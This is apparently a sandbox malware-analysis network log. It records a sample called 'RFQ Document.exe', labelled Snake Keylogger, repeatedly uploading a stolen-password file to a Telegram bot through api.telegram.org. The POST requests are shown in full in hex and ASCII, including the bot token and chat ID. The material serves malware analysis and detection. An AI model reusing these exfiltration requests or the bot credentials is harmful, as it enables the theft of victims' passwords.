2021-09-28 05:58:35 UTC	101	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 63 32 32 37 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cac2278aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:35 UTC	101	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:35 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:35 UTC	101	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12645,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808715,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.4	49840	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:35 UTC	102	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cae1260c Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:35 UTC	102	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 65 31 32 36 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cae1260cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:35 UTC	103	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:35 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:35 UTC	103	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12646,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808715,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.4	49841	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:36 UTC	103	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cafdc418 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:36 UTC	104	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 66 64 63 34 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cafdc418Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:36 UTC	104	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:36 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:36 UTC	105	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12647,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.4	49842	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:36 UTC	105	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cb159961 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:36 UTC	105	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 31 35 39 39 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cb159961Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:36 UTC	106	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:36 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:36 UTC	106	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12648,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.4	49843	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:36 UTC	107	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cb2d737b Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:36 UTC	107	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 32 64 37 33 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cb2d737bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:36 UTC	107	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:36 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:36 UTC	108	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12649,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.4	49844	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:36 UTC	108	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cb4a0dfe Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:36 UTC	109	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 34 61 30 64 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cb4a0dfeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:36 UTC	109	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:36 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:36 UTC	109	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12650,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.4	49845	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:36 UTC	110	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cb61e4d0 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:36 UTC	110	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 36 31 65 34 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cb61e4d0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:36 UTC	111	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:36 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:36 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12651,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49781	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:22 UTC	10	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c2af12f7 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:22 UTC	11	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 61 66 31 32 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c2af12f7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
